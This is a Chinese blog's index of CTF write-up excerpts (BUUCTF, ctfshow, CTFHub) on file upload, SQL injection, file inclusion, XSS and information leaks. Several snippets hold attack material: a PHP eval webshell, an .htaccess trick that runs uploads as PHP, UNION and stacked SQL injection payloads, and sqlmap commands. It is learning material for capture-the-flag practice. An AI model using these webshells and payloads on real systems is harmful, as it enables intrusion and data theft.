
CTF系列问题
文章平均质量分 55
yyyyzzzllll
这个作者很懒,什么都没留下…
展开
-
2021-深育杯misc - Login
Login题目简介:这破网站为什么不能注册? 题目访问ip:3001打开环境后是一个登陆窗口,但是没有账号点击下方的获取示例有提示下载下来一个提示文件后发现是个加密的压缩包明显的明文攻击,修改伪加密文件,提取出示例 - 副本.txt,添加到压缩包,然后明文攻击解得密码为qwe@123打开后发现password还是加密的,其中1.txt都是低字节6kb压缩包短文本文件的crc32碰撞https://github.com/theonlypwner/crc32拼接起来就是welc0me_原创 2021-11-14 09:18:34 · 3266 阅读 · 0 评论 -
BUUCTF - misc [HDCTF2019]你能发现什么蛛丝马迹吗
BUUCTF - misc [HDCTF2019]你能发现什么蛛丝马迹吗打开一个镜像文件分析镜像,看一下文件的profile值,确定内存镜像的版本volatility -f memory.img imageinfo接下来搜索一下进程,看看出题人做了些什么操作仔细看一眼时间,试试最后那个,时间最近的操作因为是win2003,查看一下这个操作从cmd命令volatility -f memory.img --profile=Win2003SP1x86 cmdscandump下来,pid是原创 2021-11-14 09:15:06 · 1254 阅读 · 0 评论 -
buuctf - re 刷题记录 1-18
buuctf - re 刷题记录 buuctf - re 刷题记录1、easyre2、reverse1持续更新1、easyreshift+f122、reverse1双击跟进str224行到25行 o替换为0,flag{hell0_w0rld},虽然很简单还是写写程序多熟练程序如下:c语言:python:持续更新...原创 2021-10-29 18:52:06 · 1672 阅读 · 0 评论 -
【从0开始学web】151-170 文件上传
【从0开始学web】151-170 文件上传web151前台验证不可靠,将允许类型改为php然后上传一句话木马成功上传,phpinfo没找到flag,蚁剑连接,找到web152后端验证文件类型,然后连接拿flagweb153后端验证,但是这里应该是对文件后缀名进行了过滤尝试不同后缀,php3、php5、phtml等,都无法解析,然后尝试上传.htaccess,发现可以上传,写入<FilesMatch "1">SetHandler application/x-htt原创 2021-10-24 11:54:31 · 802 阅读 · 0 评论 -
BUUCTF—php反序列化
BUUCTF—php反序列化[极客大挑战 2019]PHP__wakeup()绕过有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php//class.php<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _原创 2021-10-23 00:33:08 · 1025 阅读 · 1 评论 -
【从0开始学web】89-150 php特性
【从0开始学web】89-150 php特性前言php代码审计一直很薄弱,希望完成这部分之后能有所提升。web89 <?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 11:25:09# @Last Modified by: h1xa# @Last Modified time: 2020-09-18 15:38:51# @email: h1xa@ctfer.com# @link: https原创 2021-10-21 00:20:25 · 403 阅读 · 0 评论 -
curl_setopt 函数
curl_setopt 函数php curl_setopt函数的作用是为一个CURL会话设置选项,其语法是“curl_setopt (int ch, string option, mixed value)”,参数“option”表示想要的设置。三个参数分别的作用ch由 curl_init() 返回的 cURL 句柄。option需要设置的CURLOPT_XXX选项。value将设置在option选项上的值。下面先看一个示例//来源菜鸟教程,初始化一个新的cURL会话并获取一个网页<原创 2021-10-17 12:29:04 · 3636 阅读 · 0 评论 -
【从0开始学web】78-88 文件包含
【从0开始学web】78-88 文件包含文件包含题,可以先了解一下文件包含漏洞https://blog.csdn.net/yzl_007/article/details/120261435web78<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 10:52:43# @Last Modified by: h1xa# @Last Modified time: 2020-09-16 10:54:2原创 2021-10-14 23:09:37 · 3676 阅读 · 0 评论 -
2021-10-14【从0开始学web】279-300 java
【从0开始学web】279-300 java 【从0开始学web】279-300 javaweb279web278-297279-297题都是struts2框架漏洞Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架web279打开环境之后查看源码,s2-001是一个struts2命令执行漏洞编号<a style='text-decoration:none' href='/S2-001/'>where is flag?</a>继续访问:http:原创 2021-10-14 21:41:35 · 337 阅读 · 0 评论 -
文件上传常用姿势
文件上传常用姿势1、后缀检测某些情况下后缀名绕过:php、php3、php5、phtml、pht2、常用一句话GIF89a? <script language="php">eval($_REQUEST[shell])</script>3、文件类型绕过Content-Type:image/jpeg 等等例题:[极客大挑战 2019]Upload蚁剑连接...原创 2021-10-13 15:55:36 · 368 阅读 · 0 评论 -
union注入的一些模板
union注入爆破字段数admin ' order by 1 #在进行到4的时候报错/check.php?username=admin' order by 4%23&password=1 说明字段数为4用union查询测试注入点(回显点位)/check.php?username=1' union select 1,2,3%23&password=1得到回显点位为2和3爆破数据库/check.php?username=1' union select 1,databas原创 2021-10-13 00:10:19 · 196 阅读 · 0 评论 -
ctfshow【从0开始学web】29-124 命令执行
ctfshow【从0开始学web】29-124 命令执行 ctfshow【从0开始学web】29-124 命令执行web29web30web31web32web33web34web35web36web37web38web39web40持续更新。。。web29 <?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Mod原创 2021-10-10 16:55:55 · 1945 阅读 · 0 评论 -
ctfshow【从0开始学web】系列21-28 爆破
ctfshow【从0开始学web】系列21-28 爆破web21爆破什么的,都是基操解码发现是base64加密的,解码后添加好§再设置有效载荷Payload set ---->custom iterator(自定义迭代器)------>position 3------>输入字典自定义迭代器可以自定义拼接方式,position的位置即为我们的拼接方式,根据上述base64解码的tomcat密码的格式:用户名:密码 ----->则position的位数为3Positio原创 2021-10-07 17:47:47 · 1637 阅读 · 4 评论 -
ctfshow【从0开始学web】系列1-20 信息搜集
ctfshow【从0开始学web】系列1-20 ctfshow【从0开始学web】系列1-20web1web2持续更新。。。web1web2持续更新。。。原创 2021-10-06 17:20:54 · 929 阅读 · 0 评论 -
ctfshow web 1-14
web1-20 web1-20web1web2web3web4web5月饼杯web签到持续更新。。。。。web1签到题,打开查看源码,base64解码得到flagweb2题目提示:最简单的sqlsqlmap一把嗦详细的使用可以查看这个:https://blog.csdn.net/yzl_007/article/details/119974367web3打开是一段代码, <?php include($_GET['url']);?>文件包含函数,容易造成文件包含漏洞,输入原创 2021-09-30 00:57:45 · 1191 阅读 · 0 评论 -
一些Misc(持续更新)
Misc Misc编码常见编码1base常见编码2密码类编码信息搜集社会工程学搜索引擎取证隐写图片jpgoutguess隐写pnggifbmp音频频谱波形LSBTools视频文档流量包交换数据流HTMLvmdkpython字节码其他与web结合与Re结合与Android结合编码常见编码1basebase85ctfshow萌新赛 签到题给了一段编码:Ao(mgHX^E)AN2PSBOu3qI0o这里有 ^ 这类偏僻的字符,猜想应该是base64以上的编码,base85解码得到flag这里推荐原创 2021-09-29 20:51:41 · 785 阅读 · 0 评论 -
Misc---outguess隐写
outguess隐写首先在终端执行命令下载工具git clone https://github.com/crorvick/outguess随后输入以下命令进行安装cd outguess./configure && make && make install然后执行命令解密即可./outguess -k "hahahahahahaha" -r flag.jpg out.txtDASCTF八月挑战赛 [寒王’sblog]在此找到flag.jpg然后运行对原创 2021-09-26 23:43:09 · 1449 阅读 · 0 评论 -
[BUUCTF]-N1BOOK-[第一章 web入门]粗心的小李
[BUUCTF]-N1BOOK-[第一章 web入门]粗心的小李打开题目,git泄露用脚本跑一下https://github.com/lijiejie/GitHackpython2 GitHack.py http://5f7e45de-781e-480f-9316-5b11472ebba3.node4.buuoj.cn:81/.git如上使用方法,将其泄露的信息下载下来这里是有一个index.html文件打开查看flag。这一段也说明了引起git泄露漏洞的原因...原创 2021-09-06 22:41:31 · 837 阅读 · 0 评论 -
[极客大挑战 2019]Knife
[极客大挑战 2019]Knife白给的flag,给了一句话木马,直接连这里用的蚁剑,用菜刀也可以,能连接就行然后在根目录找到flag原创 2021-09-05 09:24:53 · 123 阅读 · 0 评论 -
[极客大挑战 2019]Secret File
[极客大挑战 2019]Secret File打开之后查看源码发现一些地址点击跳转再点击说查阅结束,中间肯定跳转了某个地址,抓包看看找到这个地址,打开查看一下flag.php,什么都没有,猜测是文件包含读取,源码中也给了提示这里涉及到文件包含漏洞知识-PHP伪协议,后续总结一下吧,还在学习当中。传入的file被过滤,但没有过滤filter。使用 “php://filter"伪协议” 来进行包含。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一原创 2021-09-04 23:19:39 · 154 阅读 · 0 评论 -
极客大挑战 2019]Havefun
极客大挑战 2019]Havefun查看源码get请求,cat=dog,输出flag原创 2021-09-04 17:19:17 · 142 阅读 · 0 评论 -
[BUUCTF]-[强网杯 2019]随便注
[BUUCTF]-[强网杯 2019]随便注打开题目后简单测试一下,发现已经禁止了select|update|delete|drop|insert|where一些命令,select被禁用,无法查看数据库尝试堆叠注入 0’;show databases;#得到数据库名,然后查表名1’;show tables;#查看表中字段1’;show columns from 1919810931114514;#此时还是需要select才能查询到,可以将select * from 19198109原创 2021-09-04 17:06:33 · 239 阅读 · 0 评论 -
sqlmap的简单使用(sql注入)
1、判断是否存在注入点2、查看所有数据库3、查看数据中的列表4、查看列表中的字段5、查看字段的内容6、然后还有一些其他的1、判断是否存在注入点python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=12、查看所有数据库python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buu.原创 2021-08-28 22:30:34 · 565 阅读 · 0 评论 -
[BUUCTF]-N1BOOK-[第一章 web入门]常见的搜集
[BUUCTF]-N1BOOK-[第一章 web入门]常见的搜集解题打开地址后,提示敏感文件访问robots.txt看看然后访问这个txt文件拿到一段flagindex.php~查看拿到flag2访问.index.php.swp拿到flag3拼接后提交n1book{info_1s_v3ry_imp0rtant_hack}总结常见的一些信息泄露和题解https://blog.csdn.net/yzl_007/article/details/113444143...原创 2021-08-28 21:50:54 · 979 阅读 · 0 评论 -
[BUUCTF]-Basic-Upload-Labs-Linux
[BUUCTF]-Basic-Upload-Labs-Linux打开环境地址,其实是upload-labs这个文件上传漏洞靶场,之前有文件已经介绍了各个关卡的通过技巧,这里给上链接https://blog.csdn.net/yzl_007/article/details/119395730然后这里演示一下第一关吧禁用掉javascript,将划线部分删去然后直接上传php一句话木马文件返回地址 …/upload/shell.php蚁剑连接然后在根目录找到flag可以每一关都尝试一下原创 2021-08-27 17:58:34 · 5763 阅读 · 6 评论 -
[BUUCTF]-Basic-BUU LFI COURSE 1
[BUUCTF]-Basic-BUU LFI COURSE 1打开地址简单的文件包含<?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */highlight_file(__FILE__);if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file'];}paylo原创 2021-08-27 17:47:22 · 1314 阅读 · 0 评论 -
[BUUCTF]-Basic-Linux Labs
[BUUCTF]-Basic-Linux Labs第一次做这系列的题目这里用ssh连接ssh -p 端口号 地址然后直接可以找到原创 2021-08-27 17:41:35 · 218 阅读 · 0 评论 -
[极客大挑战 2019]EasySQL
[极客大挑战 2019]EasySQL单引号报错双引号回显密码错误判断存在注入万能密码直接拿username=1&password='or '1'='1原创 2021-08-22 23:15:22 · 119 阅读 · 0 评论 -
文件上传---[GXYCTF2019]BabyUpload
与[MRCTF2020]你传你????呢同样的思路上传.htaccess文件/var/www/html/upload/43567605b935416b6c6175b4c1e8a3f1/.htaccess succesfully uploaded!然后上传任意文件的木马即可然而还是想的太简单多试几次发现文件后缀名更改全是返回的同样的结果,猜想是文件内容的问题这样修改后上传成功,估计是对<?php ?>有限制改为html文件形式上传成功pyload:http://00165原创 2021-08-20 22:45:54 · 317 阅读 · 0 评论 -
文件上传 ---[MRCTF2020]你传你呢
[MRCTF2020]你传你????呢进入题目很醒目的打招呼方式查看源码发现没什么东西接着上传试试,php被静止可以上传jpg等图片想到上传.htaccess文件解析jpg马修改Contnet-Type上传成功文件中 SetHandler application/x-httpd-php 这句话是将任何文件解析成php文件的意思,这个时候就可以上传jpg文件马来连接了。jpg文件能直接上传,写下一句话木马然后改后缀直接上传即可如下上传成功,然后用蚁剑连接http://acc07ec原创 2021-08-20 22:42:51 · 365 阅读 · 0 评论 -
[BUUCTF] [HCTF 2018] WarmUp
[BUUCTF] [HCTF 2018] WarmUpphp 代码审计打开地址后一个滑稽老手艺f12访问source.php <?php highlight_file(__FILE__); //打印代码 class emmm //定义类 emmm { public static function checkFile(&$page) //函数checkFile,参数赋给$fage {原创 2021-08-16 19:02:38 · 337 阅读 · 0 评论 -
CTFHUB xss 反射型
CTFHUB xss 反射型跨站脚本攻击XSSXSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。类型DOM型。属于反射型的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。存储型。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。反射型。需要攻击者提前构造一个恶意链接来诱使客户点击。wp测试成功弹窗,存在xss在第二个输入框复制url发送,返回成功原创 2021-08-12 10:07:00 · 906 阅读 · 0 评论 -
CTFhub技能树之文件上传
CTFhub技能书文件上传无验证没什么好说的,直接传前端验证很明显是前端js阻止了php文件上传F12找到验证,删除成功上传返回了路径蚁剑连接拿到flag.htaccessF12可以看到基本上对php\php5之类的一系列后缀都做了禁用标题也告诉了我们,改变.htaccess规则,即上传对应的图片马,解析成php文件执行一句话木马进行连接。将.htaccess文件编辑如下,将任何文件解析成phpSetHandler application/x-httpd-php抓包,修改原创 2021-08-10 21:51:50 · 532 阅读 · 0 评论 -
upload-labs靶场1-21关一些思路
upload-labs靶场1-21关一些思路1、js绕过,后缀名绕过查看源码分析,允许上传的文件类型为.jpg|.png|.gif,可以抓包修改后上传修改后缀为php即可放包然后可以看到页面成功上传返回了地址,下面就可以利用工具进行连接了。这里看到地址 …/upload/2.php 这里…/是上一目录的意思所以地址是http://ip/upload-labs/upload/2.php 口令是sb用蚁剑连接如图,测试连接数据返回成功然后点击添加成功查看目录并且能访问所以有权原创 2021-08-04 23:45:30 · 2431 阅读 · 0 评论 -
[护网杯 2018]easy_tornado
tornado模板注入给到了如下一些信息/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))url形如 :http://35848a5d-982a-45c9-a772-1b59e317746f.node3.buuoj.cn/file?filename=/flag.txt&filehash=32c8987c242bb2c5f0b0da175550d原创 2021-02-22 12:53:23 · 420 阅读 · 0 评论 -
ctfhub-信息泄露
敏感目录泄露1、git泄露–log当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。先使用dirsearch扫描是否存在git泄露python3 dirsearch.py -u <url> -e *使用githack扫描python GitHack.py <url>/.git/扫描结束后会生成扫描后的文件,在dist里面找到对应的网页文件使用cmd或者gitgit lo原创 2021-01-30 18:04:17 · 734 阅读 · 0 评论